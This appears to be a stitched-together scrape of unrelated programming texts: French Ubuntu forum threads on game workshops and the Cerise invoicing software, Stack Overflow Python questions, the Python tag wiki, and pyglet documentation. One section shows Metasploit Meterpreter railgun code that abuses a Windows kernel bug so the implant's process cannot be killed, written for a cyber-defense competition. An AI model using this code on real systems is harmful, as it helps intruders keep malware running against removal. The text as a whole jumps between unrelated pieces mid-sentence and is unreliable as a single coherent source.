qu'aiment les jeunes. Jusqu'ici nos recherches en matière de jeux intéressants sont un peu stériles. J'ai voulu mettre Yo frankie sur les ordis du boulot et ça ne fonctionne pas alors que chez moi ça marche. C'est sans doute nos ordis du boulot qui pèchent quelque part. J'ai en effet Ubuntu Lucid Lynx comme au boulot mais ma config est supérieure. Dernière modification par doudoulolita (Le 19/08/2010, à 07:29) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Par hasard, tout récemment, j'ai découvert le jeu Plee the bear mais pour contribuer, c'est encore plus difficile car c'est en python C++. Les tutoriels sont par contre très bien documentés et le jeu présente une cohérence intéressante et un mini scénario.:) A titre perso je vais continuer à apprendre python et pygame. Je verrai plus tard si je peux réunir des jeunes adultes et des ados motivés pour un autre atelier. Dernière modification par doudoulolita (Le 19/08/2010, à 07:31) Hors ligne
I am making an Ajax request into views as follows: def all_json_models(request): data = {} try: isp = request.GET['status'] present_isp = Priority.objects.filter(ispname = isp) isp_count = MultiWAN.objects.all() # data['latest_no_rules'] = latest_no_rules #data['present_isp'] = present_isp data['isp_count'] = isp_count return HttpResponse(simplejson.dumps(data)) my models.py is like class MultiWAN(models.Model): isp_name = models.CharField(max_length=10) description = models.TextField(null=True) ip_address = models.IPAddressField(null=True) subnet = models.IPAddressField(null=True) gateway = models.IPAddressField(null=True) nameserver = models.ForeignKey('NameServer') weight = models.IntegerField(null=False) interface = models.CharField(max_length=5) def __unicode__(self): """ This function is to return the values we required. Arguments: - `self`: """ # return u'%s ' % (self.isp_name) class NameServer(models.Model): """ A Isp can have more than one nameserver so far we are declearing a seperate table """ name = models.IPAddressField(null=False) class Priority(models.Model): priority = models.IntegerField(null = True) ispname = models.ForeignKey('MultiWAN') rule = models.CharField(max_length=5,null=False) From = models.IPAddressField(null=True) To = models.IPAddressField(null=True) def __unicode__(self): return u'%s ' % (self.priority) while making request i am getting the error: "coercing to Unicode: need string or buffer, NoneType found" What i am doing wrong here?
I am in the process of writing a proof of concept RESTful server using web.py Here is the script: #!/usr/bin/env python import web import json def notfound(): #return web.notfound("Sorry, the page you were looking for was not found.") return json.dumps({'ok':0, 'errcode': 404}) def internalerror(): #return web.internalerror("Bad, bad server. No donut for you.") return json.dumps({'ok':0, 'errcode': 500}) urls = ( '/(.*)', 'handleRequest', ) app = web.application(urls, globals()) app.notfound = notfound app.internalerror = internalerror class handleRequest: def GET(self, method_id): if not method_id: return web.notfound() else: return json.dumps({'ok': method_id}) def POST(self): i = web.input() data = web.data() # you can get data use this method print data pass if __name__ == "__main__": app.run() I can send GET requests ok, however when I try to send a POST request, I get an internal error. At the moment, I am not sure whether the error is due to cURL not sending the POST correctly (highly unlikely), or whether my server is not correctly implemented (more likely). This is the command I use to send the POST request: curl -i -H "Accept: application/json" -X POST -d "value":"30","type":"Tip 3","targetModule":"Target 3","active":true http://localhost:8080/xx/xxx/xxxx Here is the server response: me@localhost:~curl -i -H "Accept: application/json" -X POST -d "value":"30","type":"Tip 3","targetModule":"Target 3","active":true http://localhost:8080/xx/xxx/xxxx HTTP/1.1 500 Internal Server Error Content-Length: 1382 Content-Type: text/plain Traceback (most recent call last): File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/wsgiserver/__init__.py", line 1245, in communicate req.respond() File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/wsgiserver/__init__.py", line 775, in respond self.server.gateway(self).respond() File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/wsgiserver/__init__.py", line 2018, in respond response = self.req.server.wsgi_app(self.env, self.start_response) File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/httpserver.py", line 270, in __call__ return self.app(environ, xstart_response) File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/httpserver.py", line 238, in __call__ return self.app(environ, start_response) File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/application.py", line 277, in wsgi result = self.handle_with_processors() File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/application.py", line 247, in handle_with_processors return process(self.processors) File "/usr/local/lib/python2.6/dist-packages/web.py-0.36-py2.6.egg/web/application.py", line 244, in process raise self.internalerror() TypeError: exceptions must be old-style classes or derived from BaseException, not str What is the cause of the error - and how may I fix it?
The program seems to work, however the linear regression line created does not seem to really be the line of best fit. I think the problem is the implementation of the equation. I'm not sure if i'm interpreting it right, also I am unsure if I am doing what should be done in regards to the last paragraph of the exercise. here is the graphics library: http://mcsp.wartburg.edu/zelle/python/ppics1/code/graphics.pyif you want to try it out. here is the the exercise: Write a program that graphically plots a regression line, that is, the line with the best fit through acollection of points. First ask the user to specify the data points by clicking on them in a graphicswindow. To find the end of input, place a small rectangle labelled “Done" in the lower left corner ofthe window; the program will stop gathering points when the user clicks inside that rectangle.The regression line is the line with the following equation: here is the equation: http://i.stack.imgur.com/xj2uu.jpg I can't post pictures x is the mean of the x-values and .y is the mean of the y-values.As the user clicks on points, the program should draw them in the graphics window and keep track ofthe count of input values and the running sum of x, y, x2 and xy values. When the user clicks inside the“Done" rectangle, the program then computes value of y (using the equations above) correponding tothe x values at the left and right edges of the window to compute the endpoints of the regression linespanning the window. After the line is drawn, the program will pause for another mouse click beforeclosing the window and quitting. I can't seem to get the code formatted right so I included this http://pastebin.com/JsQ0eM2R # 8-13-LOB.py from graphics import * def listMulti(list1,list2): tempAcc = 0 for i in range(len(list1)): tempAcc += list1[i] * list2[i] print tempAcc return tempAcc def squareList(iterable): itSum = 0 for i in iterable: itSum += i**2 return itSum def listMean(iterable): return sum(iterable)/len(iterable) def regression(xList,yList,win): xBar = listMean(xList) yBar = listMean(yList) xListSq = squareList(xList) xListXyList = listMulti(xList,yList) m = ((xListXyList) - ((len(xList)*xBar*yBar)))/\ ((xListSq) - (len(xList)* (xBar**2))) y1 = yBar + m*(-50.0 - xBar) y2 = yBar + m*(50.0 - xBar) Line(Point(-50.0,y1),Point(50.0,y2)).draw(win) return "ybar: %f\txBar: %f\tm: %f\ty1: %f\ty2: %f" %(yBar,xBar,m,y1,y2) def windraw(): win = GraphWin("Line of Best Fit",500,500) win.setCoords(-50.0,-50.0,50.0,50.0) doneBox = Rectangle(Point(-50,-50),Point(-40,-45)) doneBox.setWidth(3) doneBoxTxt = Text(Point(-45,-47.5),"DONE") doneBox.draw(win) doneBoxTxt.draw(win) return win def pointBuild(xList,yList,win): tempPoint = Point(25,25) # prime tempPoint for sentinel loop # tests if given point is past rectangle created for doneBox while (tempPoint.getX() - (Point(-40,-45)).getX() == abs(tempPoint.getX() - (Point(-40,-45)).getX())) or\ (tempPoint.getY() - (Point(-40,-45)).getY() == abs(tempPoint.getY() - (Point(-40,-45)).getY())): tempPoint = win.getMouse() tempPoint.draw(win) xList.append(tempPoint.getX()); yList.append(tempPoint.getY()) def main(): xList,yList = [],[] win = windraw() pointBuild(xList,yList,win) print regression(xList,yList,win) # Test out coordinate lists accumulation from pointBuild for i in range(len(xList)-1): print "Point(%2.2f,%2.2f)" % (xList[i],yList[i]) win.getMouse() win.close() main()
#!/usr/bin/python -tt # A dictionary Of Each New SSID WirelessNetwork = {} WirelessNetwork['name'] = 'baz' WirelessNetwork['type'] = 'bar' WirelessNetwork['pass'] = 'foo' # A list of all SSIDs networkAddList = (WirelessNetwork) def addWireless(passedDict={}): print 'Adding SSID: %s' % passedDict['name'] print 'Of type: %s' % passedDict['type'] print 'With Password: %s' % passedDict['pass'] for networkDict in networkAddList: addWireless(networkDict) So I have a List "networkAddList" full of dictionaries ,i.e. "WirelessNetwork". I want to iterate that list "for networkDict in networkAddList" and pass the dictionary itself to my function "addWireless" When I run the sample code above I get the following error: TypeError: 'string indices must be integers, not str' Which makes me think that python thinks passedDict is a string, thus thinking I want string indices i.e. 0 or something rather then the key 'name'. I'm new to python but I am going to have to do this kind of thing a lot so I hope somebody can point me in the right direction as I think its pretty simple. But I can't change the basic idea , i.e. a list of dictionaries.
Python is a dynamic and strongly typed programming language that is used for a wide range of applications. It is a general-purpose, high-level programming language that is designed to emphasize usability. Python programmers can express concepts in fewer lines of code than would be possible in languages such as c, and the language has constructs intended to be used to create clear programs in a variety of domains. Two similar but incompatible versions of Python are in widespread use (2 and 3). Please consider mentioning the version and implementation that you are using when asking a question about Python. Python supports multiple programming paradigms, including object-oriented, imperative and functional programming styles. It features a fully dynamic type system and automatic memory management, similar to that of scheme, ruby, perl and tcl. Like other dynamic languages, Python is often used as a scripting language, but is also used in a wide range of non-scripting contexts. Using third-party tools, Python code can be packaged into standalone executable programs. Python interpreters are available for many operating systems. cpython, the reference implementation of Python, is free and open source software and has a community-based development model, as do nearly all of its alternative implementations. There are a wide variety of implementations more suited for specific environments or tasks. The philosophy of Python is succinctly formulated in The Zen of Python written by Tim Peters, which can be revealed by issuing this command at the interactive interpreter: >>> import this The documentation can also be accessed offline for your installation of Python in the following manner: Going into Your_Python_install_dir/Doc. There is a complete Python documentation present for the version of Python installed on your computer. Running pydoc xorpython -m pydoc xfrom the command prompt or terminal displays documentation for modulex. Unlike many other languages Python uses an indentation based syntax and this may take some getting used to for programmers familiar with braces for syntax. >>> from __future__ import braces File "<stdin>", line 1 SyntaxError: not a chance To help with the transition it is a recommendation to use a properly configured text-editor created for programmers or an IDE. Python comes with a basic IDE called IDLE to get you started. Other popular examples are the charity-ware vim, the free GNU emacs and eclipse+pydev. Take a look at this IDE comparison list for many other alternatives. Tagging recommendation: Use the python tag for all Python related questions. If you believe your question includes issues specific to incompatibilities between Python 2.x and Python 3.x, use python-2.x or python-3.x in addition to the main python tag. If you believe your question may be even more specific, you can include a version specific tag such as python-2.7. Also, consider including the tag for the specific implementation you are using other than cpython. When answering Python questions you may assume the use of cpython unless explicitly stated otherwise. References Official documentation for the current stable versions: 2.7.8 and 3.4.1. Release notes for the current stable versions: 2.7.8 and 3.4.1. Python (programming language) (Wikipedia) Python for Programmers Python - Quick Guide Porting Python 2 Code to Python 3 The non-profit Python Software Foundation manages CPython. PSF License Agreement for Python 2.7.8 and 3.4.1 Popular web frameworks based on Python The Web framework for perfectionists (with deadlines). Django makes it easier to build better Web apps more quickly and with less code. Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. It lets you build high-performing, elegant Web applications quickly. Django focuses on automating as much as possible and adhering to the DRY (Don't Repeat Yourself) principle. Flask is a micro-framework for Python based on Werkzeug, Jinja 2 and good intentions. CherryPy is a pythonic, object-oriented web framework that enables developers to build web applications in much the same way they would build any other object-oriented Python program. This results in smaller source code developed in less time. CherryPy has been in use for over 7 years and it is being used in production by many sites, from the simplest to the most demanding. A lightweight Web framework emphasizing flexibility and rapid development. It combines the very best ideas from the worlds of Ruby, Python and Perl, providing a structured but extremely flexible Python web framework. It's also one of the first projects to leverage the emerging WSGI standard, which allows extensive re-use and flexibility but only if you need it. web.py is a web framework for Python that is as simple as it is powerful. web.py is in the public domain; you can use it for whatever purpose with absolutely no restrictions. web.py lets you write web apps in Python. Built on the existing Zope 3 libraries, but aims to provide an easier learning curve and a more agile development experience. Grok does this by placing an emphasis on convention over configuration and DRY (Don't Repeat Yourself). Popular Mathematical/Scientific computing libraries in Python NumPy is the fundamental package for scientific computing with Python. It contains among other things: a powerful N-dimensional array object sophisticated (broadcasting) functions tools for integrating C/C++ and Fortran code useful linear algebra, Fourier transform, and random number capabilities These features also make it possible to use NumPy in general-purpose database applications. SciPy is an open source library for the Python programming language consisting of mathematical algorithms and functions often used in science and engineering. SciPy includes algorithms and tools for tasks such as optimization, clustering, discrete Fourier transforms, linear algebra, signal processing and multi-dimensional image processing. SciPy is closely related to NumPy and depends on many NumPy functions, including a multidimensional array that is used as the basic data structure in SciPy. matplotlib is a plotting library for the Python programming language and its NumPy numerical mathematics extension. It provides an object-oriented API for embedding plots into applications using general-purpose GUI toolkits like wxPython, Qt, or GTK. There is also a procedural "pylab" interface based on a state machine (like OpenGL), designed to closely resemble that of MATLAB. pandas, the Python Data Analysis Library, is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language. Community Chat Rooms Chat about Python with other Stack Overflow users in the Python chat room. Other Sites Tutor mailing list python-help mailing list PyCon Python Weekly Pycoder's Weekly Python Google Group Free Python programming Books Wikibooks' Non-Programmers Tutorial for Python The Official Python Tutorial Building Skills in Python Version 2.6 (Steven F. Lott) A Byte of Python (Swaroop C H.) Data Structures and Algorithms in Python (Bruno R. Preiss) Dive into Python Dive into Python 3 The Django Book (Adrian Holovaty and Jacob Kaplan-Moss) How to Think Like a Computer Scientist: Learning with Python (Allen Downey, Jeff Elkner and Chris Meyers) Invent Your Own Computer Games With Python (Al Sweigart) Learn Python The Hard Way (Zed A. Shaw) Making Games with Python & Pygame (Albert Sweigart) Natural Language Processing with Python (Steven Bird, Ewan Klein, and Edward Loper) Python Bibliotheca Python for Fun (Chris Meyers) Snake Wrangling For Kids (Jason R. Briggs) Think Python (PDF file) (Allen Downey) Porting to Python 3 (Lennart Regebro) Interactive Python learning Python Monk - Interactive Python learning in the browser Codeacademy - Learn the fundamentals of Python and dynamic programming CodeSkulptor - Interactive online IDEfor Python programming Coursera - Online course for introduction to interactive Python programming CheckiO - Game world you can explore using your Python programming skills Repl.it - Online interpreter for Python that it allow saving code for later demonstration Python Online Courses Programming for Everybody - Introduction to programming using Python. An Introduction to Interactive Programming in Python - The name explains itself.
Saw this post about a kernel bug in 64 bit Windows that is a DoS, it can also create an unkillable process: Blog post: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html Figured I’d take a swing at making a module that I could put Meterpreter into an unkillable state. Good times at CCDC could be had. Started with the C code for the bug: http://pastebin.com/QejGQXib along with the only resource I could find about the actual function: http://processhacker.sourceforge.net/doc/ntfill_8h.html#a6557e0dd024f0e9fa6132eb52d12810a I came up with this: 1 2 3 4 5 6 7 8 9 10 11 12 client.railgun.add_function('ntdll','ZwSetInformationProcess','DWORD',[ ["DWORD","ProcessHandle","in"], ["DWORD","ProcessInformationClass","in"], ["DWORD","ProcessInformation","inout"], ["DWORD","ProcessInformationLength","in"], ]) processinfo = 0x8000F129 tproc = client.sys.process.open tmem = tproc.memory.allocate(4) tproc.memory.write(tmem,processinfo) cpidhandle = client.railgun.kernel32.GetCurrentProcess()['return'] client.railgun.ntdll.ZwSetInformationProcess(cpidhandle,0x21,tmem,0x4) ScriptJunkie quickly identified that I was using a DWORD for a Handle and using 4 bits for a 64 bit process (should be 8) as well as the fact that I could use a PDWORD with the ProcessInformation inout parameter instead of writing it to memory myself. The result: 1 2 3 4 5 6 7 8 9 client.railgun.add_function('ntdll','ZwSetInformationProcess','DWORD',[ ["HANDLE","ProcessHandle","in"], ["DWORD","ProcessInformationClass","in"], ["PDWORD","ProcessInformation","inout"], ["DWORD","ProcessInformationLength","in"], ]) processinfo = 0x8000F129 cpidhandle = client.railgun.kernel32.GetCurrentProcess()['return'] client.railgun.ntdll.ZwSetInformationProcess(cpidhandle,0x21,processinfo,0x4) Which results in a process that you can’t kill, but the process is also non-functioning as far as I can tell because the Meterpreter session dies. I’m curious if with some tweaking I can get it to act much like the KillMe.exe https://code.google.com/p/ollytlscatch/downloads/detail?name=KillMe.exe Which continues to operate just fine after the modification happens.
I am not a kind of expert in python twisted, please help me out for my problem , the getChild is not calling when I am trying the path localhost:8888/dynamicchild.even put isLeaf as False in my resource . as per my understanding when I tried localhost:8888 it should return blue page of course it is happening but when ever I tried localhost:8888/somex the statement print " getChild called " should be printed on screen but now it is not happening from twisted.web import resource from twisted.web import server from twisted.internet import reactor class MyResource(resource.Resource): isLeaf=False def render(self,req): return "<body bgcolor='#00aacc' />" def getChild(self,path,request): print " getChild called " r=resource.Resource() r.putChild('',MyResource()) f=server.Site(r) reactor.listenTCP(8888,f) reactor.run()
Trees Indices Toggle frames pyglet is a cross-platform games and multimedia package. Detailed documentation is available at http://www.pyglet.org pyglet.app Application-wide functionality. pyglet.clock Precise framerate calculation, scheduling and framerate limiting. pyglet.event Event dispatch framework. pyglet.font Load fonts and render text. pyglet.font.base Abstract classes used by pyglet.font implementations. pyglet.gl OpenGL and GLU interface. pyglet.gl.gl_info Information about version and extensions of current GL implementation. pyglet.gl.glu_info Information about version and extensions of current GLU implementation. pyglet.graphics Low-level graphics rendering. pyglet.graphics.allocation Memory allocation algorithm for vertex arrays and buffers. pyglet.graphics.vertexattribute Access byte arrays as arrays of vertex attributes. pyglet.graphics.vertexbuffer Byte abstractions of Vertex Buffer Objects and vertex arrays. pyglet.graphics.vertexdomain Manage related vertex attributes within a single vertex domain. pyglet.image Image load, capture and high-level texture functions. pyglet.image.atlas Group multiple small images into larger textures. pyglet.info Get environment information useful for debugging. pyglet.media Audio and video playback. pyglet.resource Load application resources from a known path. pyglet.sprite Display positioned, scaled and rotated images. pyglet.text Text formatting, layout and display. pyglet.text.caret Provides keyboard and mouse editing procedures for text layout. pyglet.text.document Formatted and unformatted document interfaces used by text layout. pyglet.text.formats Document formats. pyglet.text.formats.attributed Extensible attributed text format for representing pyglet formatteddocuments. pyglet.text.formats.html Decode HTML into attributed text. pyglet.text.formats.plaintext Plain text decoder. pyglet.text.formats.structured Base class for structured (hierarchical) document formats. pyglet.text.layout Render simple text and formatted documents efficiently. pyglet.text.runlist Run list encoding utilities. pyglet.window Windowing and user-interface events. pyglet.window.event Events for pyglet.window. pyglet.window.key Key constants and utilities for pyglet.window. pyglet.window.mouse Mouse constants and utilities for pyglet.window. options = Global dict of pyglet options. version = The release version of this pyglet installation. Global dict of pyglet options. To change an option from its default, youmust import pyglet before any sub-packages. For example: import pyglet pyglet.options['debug_gl'] = False The default options can be overridden from the OS environment. Thecorresponding environment variable for each option key is prefaced byPYGLET_. For example, in Bash you can set the debug_gl option with: PYGLET_DEBUG_GL=True; export PYGLET_DEBUG_GL For options requiring a tuple of values, separate each value with a comma. The non-development options are: A sequence of the names of audio modules to attempt to load, in order of preference. Valid driver names are: By default, pyglet creates a hidden window with a GL context when pyglet.gl is imported. This allows resources to be loaded before the application window is created, and permits GL objects to be shared between windows even after they've been closed. You can disable the creation of the shadow window by setting this option to False. Recommended for advanced devlopers only. Since: pyglet 1.1 If set (the default), pyglet will attempt to synchronise the drawing of double-buffered windows to the border updates of the X11 window manager. This improves the appearance of the window during resize operations. This option only affects double-buffered windows on X11 servers supporting the Xsync extension with a window manager that implements the _NET_WM_SYNC_REQUEST protocol. Since: pyglet 1.1 {'audio': ('directsound', 'openal', 'alsa', 'silent'), 'debug_font': False, 'debug_gl': True, 'debug_gl_trace': False, 'debug_gl_trace_args': False, 'debug_graphics_batch': False, 'debug_lib': False, 'debug_media': False, ... The release version of this pyglet installation. Valid only if pyglet was installed from a source or binary distribution (i.e. not in a checked-out copy from SVN). Use setuptools if you need to check for a specific release version, e.g.: >>> import pyglet >>> from pkg_resources import parse_version >>> parse_version(pyglet.version) >= parse_version('1.1') True Trees Indices Toggle frames Generated by Epydoc 3.0beta1 on Fri Feb 6 10:01:49 2009 http://epydoc.sourceforge.net
I'm working with argparse and am trying to mix sub-commands and positional arguments, and the following issue came up. This code runs fine: import argparse parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() parser.add_argument('positional') subparsers.add_parser('subpositional') parser.parse_args('subpositional positional'.split()) The above code parses the args into Namespace(positional='positional'), however when I change the positional argument to have nargs='?' as such: import argparse parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() parser.add_argument('positional', nargs='?') subparsers.add_parser('subpositional') parser.parse_args('subpositional positional'.split()) It errors out with: usage: [-h] {subpositional} ... [positional] : error: unrecognized arguments: positional Why is this?
is there is way(s/w) to delete or automatically corrupt a file(.txt,.exe,.avi.....etc) if i gave that file to someone(other system) after the time specified or set by me? platform: windows , Linux If a file can be opened and read, it's going to be nigh impossible to prevent the end user from making a copy of it. What would prevent the user from, say, copying and pasting from the self-destructing file into a backup copy? Or printing out the text and scanning it back in? This is the same reason why DRM cannot protect music files with 100% certainty: if the music can be played, then at the very least someone can set up a microphone and re-record the audio. However, there is a research project called Vanish which aims to make data which can "self-destruct" in the sense that it can no longer be decrypted after some point in time. However, if the text is decoded within the allowed time period, nothing prevents the end user from copying the unencrypted text into a new file. Therefore, Vanish isn't designed for restricting the end user. Instead, its goal is to make it impossible for someone to coerce you into decrypting incriminating data (since the key necessary for decryption is no longer available. Since Vanish is still a research project and proof-of-concept, the tools provided are still fairly basic, but there is a console program for encoding files and a Firefox plug-in which can help you encrypt and decrypt blocks of text. No. Unless the reader of that file must launch some application ahead of time or have said application (let's call it EvilDeleter) running, absolutely not. You could always pack the file into some program that launches the appropriate application and passes via standard input to the application, with the intention to making the data inaccessible after a period of time. EDIT: There is no program I can find that automatically does what you want. However, by looking at shar(1) [http://www.gnu.org/software/sharutils/], you can see that simply writing a program and adding the binary output of your "locked" file into the program is simple. Python: x=open(file, 'b') `data=x.read()` --- in program after you've put data into it -- `tempfile=open('tempfile','wb') tempfile.write(data) tempfile.close() os.system('vlc.exe tempfile') os.remove('tempfile')` There you go - you just dumped your file binary into a temporary file and opened it. Mind you, this is the most basic example. You can do it in any language.
I have created a PyGTK application that shows a Dialog when the user presses a button.The dialog is loaded in my __init__ method with: builder = gtk.Builder() builder.add_from_file("filename") builder.connect_signals(self) self.myDialog = builder.get_object("dialog_name") In the event handler, the dialog is shown with the command self.myDialog.run(), but this only works once, because after run() the dialog is automatically destroyed. If I click the button a second time, the application crashes. I read that there is a way to use show() instead of run() where the dialog is not destroyed, but I feel like this is not the right way for me because I would like the dialog to behave modally and to return control to the code only after the user has closed it. Is there a simple way to repeatedly show a dialog using the run() method using gtkbuilder? I tried reloading the whole dialog using the gtkbuilder, but that did not really seem to work, the dialog was missing all child elements (and I would prefer to have to use the builder only once, at the beginning of the program). [SOLUTION] (edited) As pointed out by the answer below, using hide() does the trick. I first thought you still needed to catch the "delete-event", but this in fact not necessary. A simple example that works is: import pygtk import gtk class DialogTest: def rundialog(self, widget, data=None): self.dia.show_all() result = self.dia.run() self.dia.hide() def destroy(self, widget, data=None): gtk.main_quit() def __init__(self): self.window = gtk.Window(gtk.WINDOW_TOPLEVEL) self.window.connect("destroy", self.destroy) self.dia = gtk.Dialog('TEST DIALOG', self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT) self.dia.vbox.pack_start(gtk.Label('This is just a Test')) self.button = gtk.Button("Run Dialog") self.button.connect("clicked", self.rundialog, None) self.window.add(self.button) self.button.show() self.window.show() if __name__ == "__main__": testApp = DialogTest() gtk.main()
gmli Cerise 0.8 - TPE, freelances, artisans Hello, je me suis dit qu'une petit présentation pourrait intéresser du monde ici. Je viens de sortir aujourd'hui la version 0.8 de mon petit soft de gestion d'entreprise (cf. l'article sur le blog http://leblog.cfait.fr/post/2008/09/07/Cerise-08) Vous pouvez trouver une liste des fonctionnalités ici : http://cerise-pgi.com/index.php/features. C'est destiné aux TPE, artisans et freelances. En gros vu de loin ça donne : factures, devis, contacts, règlements, dépenses, rapport TVA, produits. Le but est d'avoir un système qui permet de facturer et gérer un peu tout ça, le plus facilement le plus rapidement possible. Pour info, c'est codé en Python, avec TurboGears, ça utilise au choix SQLite, MySQL ou PostgreSQL. L'installation des dépendances n'est pas toujours super évidente, mais Cerise en elle même est très facile à installer / configurer. Je ne sais pas précisément qui l'utilise aujourd'hui en dehors de mes clients, mais ça va de moi (freelance), à un ESAT (50 personnes) en passant par une maison d'hôtes. Dernière petite info, mais qui a sont importance, vous pouvez faire appel à moi pour du support, des développements, etc. D'ailleurs je réfléchis à une offre en ce moment, un hébergement Cerise ouvert à tous (donc vous n'avez plus rien à faire, mise à part demander de nouvelles fonctionnalités ), avec un prix au choix, allant de 0 à ce que vous voulez. Un peu comme l'album de Radiohead l'année dernière. Le but étant de fournir un service de qualité, libre, pour les petites boites, pas cher, mais qui progresse rapidement grâce aux sommes récoltés. Éventuellement lié à d'autres logiciels libres destinés aux entreprises. Enfin ça reste une idée.. si ça vous intéresse dites-le. EDIT : il y a une demo ici : http://demo.cerise-pgi.com, avec les identifiants suivante : admin/admin Dernière modification par gmli (Le 07/09/2008, à 17:43) Hors ligne snowycub Re : Cerise 0.8 - TPE, freelances, artisans Je voulais ajouter un mot pour offrir un témoignage et confirmer la qualité du travail de Guillaume. La "Maison d'hôtes" c'est moi . Après avoir cherché un peu partout une solution de facturation tournant sous linux, j'ai fait la connaissance de Cerise. Je l'ai installé pour utiliser la facturation, ca tourne depuis 3 mois, et ca marche très bien. C'est vrai qu'il y a encore ici et là quelques bugs, mais Guillaume est extrêmement réactif et le projet avance à grands pas ! Par rapport à des solutions comme Bedesk (propriétaire) ou Laurux (libre) le logiciel est certes plus compliqué à installer (d'où l'intérêt de l'offre d'hébergement pour ceux que cela rebuterait). En revanche, il est INCOMPARABLEMENT plus élégant et facile à utiliser, allez voir la démo et vous comprendrez. De plus, il est possible de customiser la sortie des factures "à mort" ce qui est vraiment appréciable (à mon gout). Le seul problème, malheureusement, semble être le peu d'intérêt (pour l'instant) de la communauté du libre pour ce projet qui en vaut vraiment la peine, il n'y a qu'à voir la réactivité sur ce forum pour des posts concernant des logiciels propriétaires, chers, à faire tourner des fois avec wine, et ce post . Alors que vraiment ce projet en vaut la peine ! Alors testez-le et aidez Guillaume à le faire avancer, ils en valent vraiment la peine (CerisePGI, et Guillaume aussi )... Christouf Re : Cerise 0.8 - TPE, freelances, artisans Une gestion de stock est prévu? Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans Merci beaucoup snowycub pour ton commentaire, ça m'a fait vraiment très plaisir Concernant la gestion des stocks, elle est partiellement codé même. Le problème étant que je n'ai jamais eu personnellement à gérer des stocks, et donc je ne suis pas certain de prendre les bonnes décisions. Si tu as du temps Christouf, je viens de créer cette page : http://trac.cfait.fr/CerisePGI-Trac/wiki/GestionDesStocks Je vais tâcher d'entrer le boulot déjà réalisé. Mais si tu pouvais mettre une sorte de retour d'expérience, la manière dont tu gères tes stocks, ça me serait très utile. Une dernière chose, pour la demo, on peut tester avec Bénenuts et les identifiants admin/admin. Hors ligne Alph Re : Cerise 0.8 - TPE, freelances, artisans Bonjour, Cerise semble pas mal en effet mais.... Je vais donc faire le râleur du coin 1- sur le site http://www.cerise-pgi.com/ je n'ai pas trouvé comment installer Cerise sur mon ordi , il y a bien un lien vers le code-source, mais après... Alors, facile l'install pour le néophyte ? Je ne pense pas. S'il faut naviguer entre un site un blog et que sais-je pour trouver une info, excusé, mais la ce n'est pas pratique du tout. Viiiite un tuto sur Ubuntu.fr serait bienvenue Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans En fait tout est sur le site de développement. C'est vrai qu'il faudrait être plus clair sur le site principal. La page expliquant l'installation est ici : http://trac.cfait.fr/CerisePGI-Trac/wik … eCerisePGI Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Bonjour, Je suis un utilisateur néophyte de Ubuntu (8.04LTS). J'ai essayé Cerise depuis cerise-pgi.com et souhaite l'adopter pour mon activité. Je rencontre des difficultés lors du lancement du serveur: j'ai pu "créer une nouvelle entreprise". Je peux me connecter grâce à mes identifiants mais j'obtiens la page suivante: 500 Internal error The server encountered an unexpected condition which prevented it from fulfilling the request. Page handler: <bound method Root.dashboard of <cerisepgi.controllers.root.Root object at 0x8c58e0c>> Traceback (most recent call last): File "/var/lib/python-support/python2.5/cherrypy/_cphttptools.py", line 105, in _run self.main() File "/var/lib/python-support/python2.5/cherrypy/_cphttptools.py", line 254, in main body = page_handler(*virtual_path, **self.params) File "<string>", line 3, in dashboard File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 363, in expose *args, **kw) File "<string>", line 5, in run_with_transaction File "/var/lib/python-support/python2.5/turbogears/database.py", line 356, in so_rwt retval = func(*args, **kw) File "<string>", line 5, in _expose File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 378, in <lambda> mapping, fragment, args, kw))) File "/var/lib/python-support/python2.5/turbogears/controllers.py", line 405, in _execute_func output = errorhandling.try_call(func, *args, **kw) File "/var/lib/python-support/python2.5/turbogears/errorhandling.py", line 72, in try_call return func(self, *args, **kw) File "<string>", line 3, in dashboard File "/var/lib/python-support/python2.5/turbogears/identity/conditions.py", line 242, in require return fn(self, *args, **kwargs) File "/home/gml/cerise/0.8/CerisePGI/cerisepgi/controllers/root.py", line 80, in dashboard File "/usr/lib/python2.5/site-packages/sqlobject/sqlbuilder.py", line 381, in __getattr__ raise AttributeError("%s instance has no attribute '%s'" % (self.soClass.__name__, attr)) AttributeError: Invoice instance has no attribute 'enterprise' Et là, je sèche complètement, mes connaissances en serveurs et BdD étant, disons-le, nulles! Pour l'installation, j'ai suivi le tuto de Guillaume, mais je n'ai pas tout compris.:( Pouvez-vous m'aider pour la dernière ligne droite, SVP? Merci d'avance Hors ligne gmli Re : Cerise 0.8 - TPE, freelances, artisans As-tu fait "tg-admin sql create" à la racine du projet ? Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Voici la réponse que j'obtiens lors de la commande "tg-admin sql create": Using database URI sqlite:///var/www/html/CerisePGI/devdata.sqlite Warning: a circular reference was detected in the model. Unable to sort the classes by dependency: they will be treated in alphabetic order. This may or may not work depending on your database backend. The error was: Found a circular reference: Activity --> Enterprise --> Address --> Contact --> Company --> Contact Exception exceptions.AttributeError: "'sqlite3.Connection' object has no attribute 'autocommit'" in <bound method Transaction.__del__ of <sqlobject.dbconnection.Transaction object at 0x8d0b2ec>> ignored Hors ligne yris Re : Cerise 0.8 - TPE, freelances, artisans Info complémentaire qui a peut-être son importance: dans le répertoire /var/www/html , j'ai installé précédemment SugarCRM qui contient aussi une BdD. Hors ligne jeanclaude1946 Re : Cerise 0.8 - TPE, freelances, artisans Bonjour, Je suis cette liste avec 